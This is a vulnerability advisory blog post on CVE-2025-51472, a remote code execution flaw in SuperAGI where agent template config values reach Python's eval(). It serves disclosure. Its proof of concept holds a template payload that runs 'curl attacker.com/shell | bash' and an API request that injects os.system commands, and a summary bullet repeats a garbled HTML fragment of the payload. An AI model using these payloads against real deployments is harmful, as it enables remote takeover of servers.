Skip to content
CVE-2025-51472: SuperAGI RCE via Unsafe Eval in Template Config

CVE-2025-51472: SuperAGI RCE via Unsafe Eval in Template Config

Grayscale portrait of a young man looking left, wearing a striped lanyard, with an olive green dot pattern background.Artemiy Malyshau· Co-founder & CTO2 min read

Key takeaways

  • com/shell | bash’)”</span><span class=“hljs-punctuation”>,</span> <span class=“hljs-attr”>“instruction”</span><span class=“hljs-punctuation”>:</span> <span class=“hljs-punctuation”>[</span><span class=“hljs-punctuation”>]</span><span class=“hljs-punctuation”>,</span> <span class=“hljs-attr”>“constraints”</span><span class=“hljs-punctuation”>:</span> <span class=“hljs-punctuation”>[</span><span class=“hljs-punctuation”>]</span> <span class=“hljs-punctuation”>}</span> <span class=“hljs-punctuation”>}</span> </code>
  • This vulnerability allows for complete system compromise by an attacker who can manipulate template data through either the marketplace or direct API access.

Description#

An RCE was found in SuperAGI in the AgentTemplate.eval_agent_config method. The vulnerability is caused by the direct use of Python’s eval() function on user-controlled input without any sanitization or validation. When an agent template is cloned from the marketplace or updated via the API, configuration values for keys such as ‘goal’, ‘constraints’, and ‘instruction’ are passed directly to eval(). The code in agent_template.py explicitly evaluates these values:

<code class="hljs language-python"><span class="hljs-keyword">elif</span> key == <span class="hljs-string">"goal"</span> <span class="hljs-keyword">or</span> key == <span class="hljs-string">"constraints"</span> <span class="hljs-keyword">or</span> key == <span class="hljs-string">"instruction"</span>:
    <span class="hljs-keyword">return</span> <span class="hljs-built_in">eval</span>(value)
</code>

Since these values can be controlled by an attacker, arbitrary Python code execution is possible, leading to complete system compromise.

Source - Sink Analysis#

Source:

  • Function: AgentTemplate.fetch_marketplace_detail
  • File Path: superagi/models/agent_template.py
  • Description: Initial HTTP request that receives untrusted data from marketplace API.
  • Code: response = requests.get(marketplace_url + “agent_templates/marketplace/template_details/” + str(agent_template_id),

Intermediate:

  • Function: AgentTemplate.clone_agent_template_from_marketplace
  • File Path: superagi/models/agent_template.py
  • Description: Processes marketplace response and stores config values.
  • Code: agent_configurations.append(AgentTemplateConfig(agent_template_id=template.id, key=key, value=str(value[“value”])))

Sink:

  • Function: AgentTemplate.eval_agent_config
  • File Path: superagi/models/agent_template.py
  • Description: Dangerous eval() call on user-controlled input.
  • Code: return eval(value)

PoC#

  1. Create a malicious marketplace template JSON: jsonCopy<code class=“hljs language-json”><span class=“hljs-punctuation”>{</span> <span class=“hljs-attr”>“name”</span><span class=“hljs-punctuation”>:</span> <span class=“hljs-string”>“Evil Template”</span><span class=“hljs-punctuation”>,</span> <span class=“hljs-attr”>“description”</span><span class=“hljs-punctuation”>:</span> <span class=“hljs-string”>“RCE”</span><span class=“hljs-punctuation”>,</span> <span class=“hljs-attr”>“agent_workflow_name”</span><span class=“hljs-punctuation”>:</span> <span class=“hljs-string”>“Goal Based Agent”</span><span class=“hljs-punctuation”>,</span> <span class=“hljs-attr”>“configs”</span><span class=“hljs-punctuation”>:</span> <span class=“hljs-punctuation”>{</span> <span class=“hljs-attr”>“goal”</span><span class=“hljs-punctuation”>:</span> <span class=“hljs-string”>“__import__(‘os’).system(‘curl attacker.com/shell | bash’)”</span><span class=“hljs-punctuation”>,</span> <span class=“hljs-attr”>“instruction”</span><span class=“hljs-punctuation”>:</span> <span class=“hljs-punctuation”>[</span><span class=“hljs-punctuation”>]</span><span class=“hljs-punctuation”>,</span> <span class=“hljs-attr”>“constraints”</span><span class=“hljs-punctuation”>:</span> <span class=“hljs-punctuation”>[</span><span class=“hljs-punctuation”>]</span> <span class=“hljs-punctuation”>}</span> <span class=“hljs-punctuation”>}</span> </code>
  2. Host this JSON at a marketplace endpoint that the target SuperAGI instance trusts.
  3. When a victim clones this template, the eval() call in eval_agent_config will execute the malicious Python code in the ‘goal’ config.

You can also exploit the same path via the template update API after creating a template:

<code class="hljs language-bash">curl -X PUT <span class="hljs-string">"http://localhost:3000/api/agent_templates/update_agent_template/1"</span> \
  -H <span class="hljs-string">"Content-Type: application/json"</span> \
  -d <span class="hljs-string">'{
    "name": "Exploited Template",
    "description": "RCE Test",
    "agent_configs": {
        "agent_workflow": "Goal Based Workflow",
        "goal": "__import__(\"os\").system(\"touch /tmp/pwned\")",
        "instruction": ["Test instruction"],
        "constraints": ["Test constraint"],
        "tools": ["Read File", "Write File"],
        "exit": "No exit criterion",
        "iteration_interval": 500,
        "model": "gpt-3.5-turbo",
        "max_iterations": 25,
        "permission_type": "God Mode",
        "LTM_DB": "Pinecone"
    }
}'</span>
</code>

Once the template is poisoned, accessing it triggers the execution: curl “http://localhost:3000/api/agent_templates/agent_config?agent_template_id=1”.

Impact#

This vulnerability allows for complete system compromise by an attacker who can manipulate template data through either the marketplace or direct API access. The attacker can execute arbitrary code with the permissions of the service running SuperAGI, potentially leading to data theft, lateral movement within the network, persistent system access or infrastructure compromise.

Grayscale portrait of a young man looking left, wearing a striped lanyard, with an olive green dot pattern background.

Artemiy Malyshau

Co-founder & CTO

Artemiy served in an elite unit of the Austrian Cyber Forces, defending national infrastructure He was then the first employee at a government-backed cybersecurity research group, where he led security projects for Interpol and national governments. At Gecko he builds the platform trusted to sit inside Fortune 500 codebases, and holds it to the standard those governments taught him.

Frequently asked questions

Related content

The latest news, technologies, and resources from our team.

Subscribe to the Gecko Security newsletter

Occasional updates, new content, and insights. No spam; unsubscribe anytime.

We use your email only to send you our newsletter. See our privacy policy for how we handle your data. You can unsubscribe at any time.